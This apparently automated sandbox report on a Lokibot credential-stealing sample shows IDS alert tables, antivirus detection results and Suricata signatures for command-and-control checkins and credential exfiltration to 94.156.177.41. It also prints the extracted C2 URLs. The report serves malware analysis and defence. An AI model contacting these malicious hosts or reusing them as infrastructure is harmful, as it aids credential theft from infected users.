                          2024-12-09T08:52:34.283694+010020243181Malware Command and Control Activity Detected192.168.2.64984194.156.177.4180TCP
                          2024-12-09T08:52:36.102690+010020243181Malware Command and Control Activity Detected192.168.2.64984894.156.177.4180TCP
                          2024-12-09T08:52:37.818426+010020243181Malware Command and Control Activity Detected192.168.2.64985494.156.177.4180TCP
                          2024-12-09T08:52:39.497811+010020243181Malware Command and Control Activity Detected192.168.2.64985994.156.177.4180TCP
                          2024-12-09T08:52:41.152631+010020243181Malware Command and Control Activity Detected192.168.2.64986394.156.177.4180TCP
                          2024-12-09T08:52:42.964742+010020243181Malware Command and Control Activity Detected192.168.2.64986794.156.177.4180TCP
                          2024-12-09T08:52:44.776414+010020243181Malware Command and Control Activity Detected192.168.2.64987394.156.177.4180TCP
                          2024-12-09T08:52:46.592675+010020243181Malware Command and Control Activity Detected192.168.2.64987994.156.177.4180TCP
                          2024-12-09T08:52:48.268574+010020243181Malware Command and Control Activity Detected192.168.2.64988594.156.177.4180TCP
                          2024-12-09T08:52:50.978504+010020243181Malware Command and Control Activity Detected192.168.2.64988894.156.177.4180TCP
                          2024-12-09T08:52:52.651034+010020243181Malware Command and Control Activity Detected192.168.2.64989694.156.177.4180TCP
                          2024-12-09T08:52:54.731708+010020243181Malware Command and Control Activity Detected192.168.2.64990094.156.177.4180TCP
                          2024-12-09T08:52:56.395944+010020243181Malware Command and Control Activity Detected192.168.2.64990694.156.177.4180TCP
                          2024-12-09T08:52:58.223873+010020243181Malware Command and Control Activity Detected192.168.2.64991194.156.177.4180TCP
                          2024-12-09T08:53:00.043307+010020243181Malware Command and Control Activity Detected192.168.2.64991794.156.177.4180TCP
                          2024-12-09T08:53:01.856477+010020243181Malware Command and Control Activity Detected192.168.2.64992494.156.177.4180TCP
                          2024-12-09T08:53:03.676877+010020243181Malware Command and Control Activity Detected192.168.2.64992994.156.177.4180TCP
                          2024-12-09T08:53:05.342475+010020243181Malware Command and Control Activity Detected192.168.2.64993594.156.177.4180TCP
                          2024-12-09T08:53:07.013704+010020243181Malware Command and Control Activity Detected192.168.2.64993794.156.177.4180TCP
                          2024-12-09T08:53:08.848305+010020243181Malware Command and Control Activity Detected192.168.2.64994394.156.177.4180TCP
                          2024-12-09T08:53:10.512942+010020243181Malware Command and Control Activity Detected192.168.2.64994994.156.177.4180TCP
                          2024-12-09T08:53:12.323602+010020243181Malware Command and Control Activity Detected192.168.2.64995494.156.177.4180TCP
                          2024-12-09T08:53:14.137920+010020243181Malware Command and Control Activity Detected192.168.2.64996094.156.177.4180TCP
                          2024-12-09T08:53:15.952241+010020243181Malware Command and Control Activity Detected192.168.2.64996294.156.177.4180TCP
                          2024-12-09T08:53:17.623736+010020243181Malware Command and Control Activity Detected192.168.2.64996894.156.177.4180TCP
                          2024-12-09T08:53:19.453534+010020243181Malware Command and Control Activity Detected192.168.2.64997394.156.177.4180TCP
                          2024-12-09T08:53:21.134282+010020243181Malware Command and Control Activity Detected192.168.2.64997894.156.177.4180TCP
                          2024-12-09T08:53:23.236388+010020243181Malware Command and Control Activity Detected192.168.2.64998494.156.177.4180TCP
                          2024-12-09T08:53:25.096431+010020243181Malware Command and Control Activity Detected192.168.2.64999094.156.177.4180TCP
                          2024-12-09T08:53:26.917838+010020243181Malware Command and Control Activity Detected192.168.2.64999494.156.177.4180TCP
                          2024-12-09T08:53:31.731754+010020243181Malware Command and Control Activity Detected192.168.2.65000094.156.177.4180TCP
                          2024-12-09T08:53:34.080464+010020243181Malware Command and Control Activity Detected192.168.2.65001494.156.177.4180TCP
                          2024-12-09T08:53:38.905570+010020243181Malware Command and Control Activity Detected192.168.2.65002094.156.177.4180TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T08:51:39.566096+010020216411A Network Trojan was detected192.168.2.64970794.156.177.4180TCP
                          2024-12-09T08:51:41.388226+010020216411A Network Trojan was detected192.168.2.64970894.156.177.4180TCP
                          2024-12-09T08:51:43.494161+010020216411A Network Trojan was detected192.168.2.64971094.156.177.4180TCP
                          2024-12-09T08:51:45.316994+010020216411A Network Trojan was detected192.168.2.64971294.156.177.4180TCP
                          2024-12-09T08:51:46.997946+010020216411A Network Trojan was detected192.168.2.64971394.156.177.4180TCP
                          2024-12-09T08:51:48.825174+010020216411A Network Trojan was detected192.168.2.64971594.156.177.4180TCP
                          2024-12-09T08:51:50.500278+010020216411A Network Trojan was detected192.168.2.64972194.156.177.4180TCP
                          2024-12-09T08:51:52.709648+010020216411A Network Trojan was detected192.168.2.64972694.156.177.4180TCP
                          2024-12-09T08:51:54.371881+010020216411A Network Trojan was detected192.168.2.64973294.156.177.4180TCP
                          2024-12-09T08:51:56.186859+010020216411A Network Trojan was detected192.168.2.64973694.156.177.4180TCP
                          2024-12-09T08:52:00.874032+010020216411A Network Trojan was detected192.168.2.64975594.156.177.4180TCP
                          2024-12-09T08:52:02.924152+010020216411A Network Trojan was detected192.168.2.64975794.156.177.4180TCP
                          2024-12-09T08:52:07.593802+010020216411A Network Trojan was detected192.168.2.64977394.156.177.4180TCP
                          2024-12-09T08:52:09.406949+010020216411A Network Trojan was detected192.168.2.64977594.156.177.4180TCP
                          2024-12-09T08:52:11.232353+010020216411A Network Trojan was detected192.168.2.64978194.156.177.4180TCP
                          2024-12-09T08:52:13.423061+010020216411A Network Trojan was detected192.168.2.64978794.156.177.4180TCP
                          2024-12-09T08:52:15.682605+010020216411A Network Trojan was detected192.168.2.64979394.156.177.4180TCP
                          2024-12-09T08:52:17.325150+010020216411A Network Trojan was detected192.168.2.64979994.156.177.4180TCP
                          2024-12-09T08:52:22.154447+010020216411A Network Trojan was detected192.168.2.64981194.156.177.4180TCP
                          2024-12-09T08:52:23.972500+010020216411A Network Trojan was detected192.168.2.64981894.156.177.4180TCP
                          2024-12-09T08:52:25.653268+010020216411A Network Trojan was detected192.168.2.64982394.156.177.4180TCP
                          2024-12-09T08:52:27.621178+010020216411A Network Trojan was detected192.168.2.64982894.156.177.4180TCP
                          2024-12-09T08:52:29.310465+010020216411A Network Trojan was detected192.168.2.64983394.156.177.4180TCP
                          2024-12-09T08:52:31.142639+010020216411A Network Trojan was detected192.168.2.64983694.156.177.4180TCP
                          2024-12-09T08:52:32.844275+010020216411A Network Trojan was detected192.168.2.64984194.156.177.4180TCP
                          2024-12-09T08:52:34.672995+010020216411A Network Trojan was detected192.168.2.64984894.156.177.4180TCP
                          2024-12-09T08:52:36.479932+010020216411A Network Trojan was detected192.168.2.64985494.156.177.4180TCP
                          2024-12-09T08:52:38.214537+010020216411A Network Trojan was detected192.168.2.64985994.156.177.4180TCP
                          2024-12-09T08:52:39.872509+010020216411A Network Trojan was detected192.168.2.64986394.156.177.4180TCP
                          2024-12-09T08:52:41.529353+010020216411A Network Trojan was detected192.168.2.64986794.156.177.4180TCP
                          2024-12-09T08:52:43.346921+010020216411A Network Trojan was detected192.168.2.64987394.156.177.4180TCP
                          2024-12-09T08:52:45.154565+010020216411A Network Trojan was detected192.168.2.64987994.156.177.4180TCP
                          2024-12-09T08:52:46.983185+010020216411A Network Trojan was detected192.168.2.64988594.156.177.4180TCP
                          2024-12-09T08:52:48.658727+010020216411A Network Trojan was detected192.168.2.64988894.156.177.4180TCP
                          2024-12-09T08:52:51.358825+010020216411A Network Trojan was detected192.168.2.64989694.156.177.4180TCP
                          2024-12-09T08:52:53.027579+010020216411A Network Trojan was detected192.168.2.64990094.156.177.4180TCP
                          2024-12-09T08:52:55.108776+010020216411A Network Trojan was detected192.168.2.64990694.156.177.4180TCP
                          2024-12-09T08:52:56.790419+010020216411A Network Trojan was detected192.168.2.64991194.156.177.4180TCP
                          2024-12-09T08:52:58.611498+010020216411A Network Trojan was detected192.168.2.64991794.156.177.4180TCP
                          2024-12-09T08:53:00.419701+010020216411A Network Trojan was detected192.168.2.64992494.156.177.4180TCP
                          2024-12-09T08:53:02.244480+010020216411A Network Trojan was detected192.168.2.64992994.156.177.4180TCP
                          2024-12-09T08:53:04.064839+010020216411A Network Trojan was detected192.168.2.64993594.156.177.4180TCP
                          2024-12-09T08:53:05.731669+010020216411A Network Trojan was detected192.168.2.64993794.156.177.4180TCP
                          2024-12-09T08:53:07.405384+010020216411A Network Trojan was detected192.168.2.64994394.156.177.4180TCP
                          2024-12-09T08:53:09.232229+010020216411A Network Trojan was detected192.168.2.64994994.156.177.4180TCP
                          2024-12-09T08:53:10.889178+010020216411A Network Trojan was detected192.168.2.64995494.156.177.4180TCP
                          2024-12-09T08:53:12.702697+010020216411A Network Trojan was detected192.168.2.64996094.156.177.4180TCP
                          2024-12-09T08:53:14.518189+010020216411A Network Trojan was detected192.168.2.64996294.156.177.4180TCP
                          2024-12-09T08:53:16.345760+010020216411A Network Trojan was detected192.168.2.64996894.156.177.4180TCP
                          2024-12-09T08:53:18.018612+010020216411A Network Trojan was detected192.168.2.64997394.156.177.4180TCP
                          2024-12-09T08:53:19.857048+010020216411A Network Trojan was detected192.168.2.64997894.156.177.4180TCP
                          2024-12-09T08:53:21.514620+010020216411A Network Trojan was detected192.168.2.64998494.156.177.4180TCP
                          2024-12-09T08:53:23.627769+010020216411A Network Trojan was detected192.168.2.64999094.156.177.4180TCP
                          2024-12-09T08:53:25.479289+010020216411A Network Trojan was detected192.168.2.64999494.156.177.4180TCP
                          2024-12-09T08:53:27.294180+010020216411A Network Trojan was detected192.168.2.65000094.156.177.4180TCP
                          2024-12-09T08:53:32.251367+010020216411A Network Trojan was detected192.168.2.65001494.156.177.4180TCP
                          2024-12-09T08:53:34.465271+010020216411A Network Trojan was detected192.168.2.65002094.156.177.4180TCP
                          2024-12-09T08:53:39.296364+010020216411A Network Trojan was detected192.168.2.65003294.156.177.4180TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T08:51:39.566096+010028257661Malware Command and Control Activity Detected192.168.2.64970794.156.177.4180TCP
                          2024-12-09T08:51:41.388226+010028257661Malware Command and Control Activity Detected192.168.2.64970894.156.177.4180TCP
                          2024-12-09T08:51:43.494161+010028257661Malware Command and Control Activity Detected192.168.2.64971094.156.177.4180TCP
                          2024-12-09T08:51:45.316994+010028257661Malware Command and Control Activity Detected192.168.2.64971294.156.177.4180TCP
                          2024-12-09T08:51:46.997946+010028257661Malware Command and Control Activity Detected192.168.2.64971394.156.177.4180TCP
                          2024-12-09T08:51:48.825174+010028257661Malware Command and Control Activity Detected192.168.2.64971594.156.177.4180TCP
                          2024-12-09T08:51:50.500278+010028257661Malware Command and Control Activity Detected192.168.2.64972194.156.177.4180TCP
                          2024-12-09T08:51:52.709648+010028257661Malware Command and Control Activity Detected192.168.2.64972694.156.177.4180TCP
                          2024-12-09T08:51:54.371881+010028257661Malware Command and Control Activity Detected192.168.2.64973294.156.177.4180TCP
                          2024-12-09T08:51:56.186859+010028257661Malware Command and Control Activity Detected192.168.2.64973694.156.177.4180TCP
                          2024-12-09T08:52:00.874032+010028257661Malware Command and Control Activity Detected192.168.2.64975594.156.177.4180TCP
                          2024-12-09T08:52:02.924152+010028257661Malware Command and Control Activity Detected192.168.2.64975794.156.177.4180TCP
                          2024-12-09T08:52:07.593802+010028257661Malware Command and Control Activity Detected192.168.2.64977394.156.177.4180TCP
                          2024-12-09T08:52:09.406949+010028257661Malware Command and Control Activity Detected192.168.2.64977594.156.177.4180TCP
                          2024-12-09T08:52:11.232353+010028257661Malware Command and Control Activity Detected192.168.2.64978194.156.177.4180TCP
                          2024-12-09T08:52:13.423061+010028257661Malware Command and Control Activity Detected192.168.2.64978794.156.177.4180TCP
                          2024-12-09T08:52:15.682605+010028257661Malware Command and Control Activity Detected192.168.2.64979394.156.177.4180TCP
                          2024-12-09T08:52:17.325150+010028257661Malware Command and Control Activity Detected192.168.2.64979994.156.177.4180TCP
                          2024-12-09T08:52:22.154447+010028257661Malware Command and Control Activity Detected192.168.2.64981194.156.177.4180TCP
                          2024-12-09T08:52:23.972500+010028257661Malware Command and Control Activity Detected192.168.2.64981894.156.177.4180TCP
                          2024-12-09T08:52:25.653268+010028257661Malware Command and Control Activity Detected192.168.2.64982394.156.177.4180TCP
                          2024-12-09T08:52:27.621178+010028257661Malware Command and Control Activity Detected192.168.2.64982894.156.177.4180TCP
                          2024-12-09T08:52:29.310465+010028257661Malware Command and Control Activity Detected192.168.2.64983394.156.177.4180TCP
                          2024-12-09T08:52:31.142639+010028257661Malware Command and Control Activity Detected192.168.2.64983694.156.177.4180TCP
                          2024-12-09T08:52:32.844275+010028257661Malware Command and Control Activity Detected192.168.2.64984194.156.177.4180TCP
                          2024-12-09T08:52:34.672995+010028257661Malware Command and Control Activity Detected192.168.2.64984894.156.177.4180TCP
                          2024-12-09T08:52:36.479932+010028257661Malware Command and Control Activity Detected192.168.2.64985494.156.177.4180TCP
                          2024-12-09T08:52:38.214537+010028257661Malware Command and Control Activity Detected192.168.2.64985994.156.177.4180TCP
                          2024-12-09T08:52:39.872509+010028257661Malware Command and Control Activity Detected192.168.2.64986394.156.177.4180TCP
                          2024-12-09T08:52:41.529353+010028257661Malware Command and Control Activity Detected192.168.2.64986794.156.177.4180TCP
                          2024-12-09T08:52:43.346921+010028257661Malware Command and Control Activity Detected192.168.2.64987394.156.177.4180TCP
                          2024-12-09T08:52:45.154565+010028257661Malware Command and Control Activity Detected192.168.2.64987994.156.177.4180TCP
                          2024-12-09T08:52:46.983185+010028257661Malware Command and Control Activity Detected192.168.2.64988594.156.177.4180TCP
                          2024-12-09T08:52:48.658727+010028257661Malware Command and Control Activity Detected192.168.2.64988894.156.177.4180TCP
                          2024-12-09T08:52:51.358825+010028257661Malware Command and Control Activity Detected192.168.2.64989694.156.177.4180TCP
                          2024-12-09T08:52:53.027579+010028257661Malware Command and Control Activity Detected192.168.2.64990094.156.177.4180TCP
                          2024-12-09T08:52:55.108776+010028257661Malware Command and Control Activity Detected192.168.2.64990694.156.177.4180TCP
                          2024-12-09T08:52:56.790419+010028257661Malware Command and Control Activity Detected192.168.2.64991194.156.177.4180TCP
                          2024-12-09T08:52:58.611498+010028257661Malware Command and Control Activity Detected192.168.2.64991794.156.177.4180TCP
                          2024-12-09T08:53:00.419701+010028257661Malware Command and Control Activity Detected192.168.2.64992494.156.177.4180TCP
                          2024-12-09T08:53:02.244480+010028257661Malware Command and Control Activity Detected192.168.2.64992994.156.177.4180TCP
                          2024-12-09T08:53:04.064839+010028257661Malware Command and Control Activity Detected192.168.2.64993594.156.177.4180TCP
                          2024-12-09T08:53:05.731669+010028257661Malware Command and Control Activity Detected192.168.2.64993794.156.177.4180TCP
                          2024-12-09T08:53:07.405384+010028257661Malware Command and Control Activity Detected192.168.2.64994394.156.177.4180TCP
                          2024-12-09T08:53:09.232229+010028257661Malware Command and Control Activity Detected192.168.2.64994994.156.177.4180TCP
                          2024-12-09T08:53:10.889178+010028257661Malware Command and Control Activity Detected192.168.2.64995494.156.177.4180TCP
                          2024-12-09T08:53:12.702697+010028257661Malware Command and Control Activity Detected192.168.2.64996094.156.177.4180TCP
                          2024-12-09T08:53:14.518189+010028257661Malware Command and Control Activity Detected192.168.2.64996294.156.177.4180TCP
                          2024-12-09T08:53:16.345760+010028257661Malware Command and Control Activity Detected192.168.2.64996894.156.177.4180TCP
                          2024-12-09T08:53:18.018612+010028257661Malware Command and Control Activity Detected192.168.2.64997394.156.177.4180TCP
                          2024-12-09T08:53:19.857048+010028257661Malware Command and Control Activity Detected192.168.2.64997894.156.177.4180TCP
                          2024-12-09T08:53:21.514620+010028257661Malware Command and Control Activity Detected192.168.2.64998494.156.177.4180TCP
                          2024-12-09T08:53:23.627769+010028257661Malware Command and Control Activity Detected192.168.2.64999094.156.177.4180TCP
                          2024-12-09T08:53:25.479289+010028257661Malware Command and Control Activity Detected192.168.2.64999494.156.177.4180TCP
                          2024-12-09T08:53:27.294180+010028257661Malware Command and Control Activity Detected192.168.2.65000094.156.177.4180TCP
                          2024-12-09T08:53:32.251367+010028257661Malware Command and Control Activity Detected192.168.2.65001494.156.177.4180TCP
                          2024-12-09T08:53:34.465271+010028257661Malware Command and Control Activity Detected192.168.2.65002094.156.177.4180TCP
                          2024-12-09T08:53:39.296364+010028257661Malware Command and Control Activity Detected192.168.2.65003294.156.177.4180TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: 0yWVteGq5T.exeAvira: detected
                          Source: http://kbfvzoboss.bid/alien/fre.phpAvira URL Cloud: Label: phishing
                          Source: http://alphastand.win/alien/fre.phpAvira URL Cloud: Label: malware
                          Source: http://alphastand.trade/alien/fre.phpAvira URL Cloud: Label: malware
                          Source: http://alphastand.top/alien/fre.phpAvira URL Cloud: Label: phishing
                          Source: http://94.156.177.41/simple/five/fre.phpAvira URL Cloud: Label: malware
                          Source: 0.2.0yWVteGq5T.exe.400000.0.unpackMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u00c6\u00cb\u00d1\u00ce\u00ca\u00c9\u00d1\u00ce\u00c8\u00c8\u00d1\u00cb\u00ce\u00d0\u008c\u0096\u0092\u008f\u0093\u009a\u00d0\u0099\u0096\u0089\u009a\u00d0\u0099\u008d\u009a\u00d1\u008f\u0097\u008f"]}
                          Source: 0yWVteGq5T.exeReversingLabs: Detection: 97%
                          Source: 0yWVteGq5T.exeVirustotal: Detection: 87%Perma Link
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Source: 0yWVteGq5T.exeJoe Sandbox ML: detected
                          Source: 0yWVteGq5T.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,0_2_00403D74
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 4x nop then xor byte ptr [esi], bl0_2_004036F2
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 4x nop then cmp byte ptr [esi], 00000000h0_2_004036F2

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49715 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49715 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49715 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49715 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49715 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49715
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49708 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49708 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49757 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49757 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49713 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49732 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49726 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49793 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49726 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49726 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49755 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49712 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49736 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49721 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49713 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49732 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49707 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49755 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49757 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49708 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49710 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49712 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49713 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49732 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49707 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49721 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49781 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49721 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49726 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49757 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49712 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49710 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49710 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49793 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49707 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49793 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49713 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49757 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49712 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49712 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49726 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49755 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:49708 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49721 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49710 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49710 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:49707 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49721 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49793 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49781 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49781 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49757
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49799 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49799 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49732 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49732 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49793 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49781 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49755 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49781 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49755 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49726
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49799 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49712
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49713 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49799 -> 94.156.177.41:80
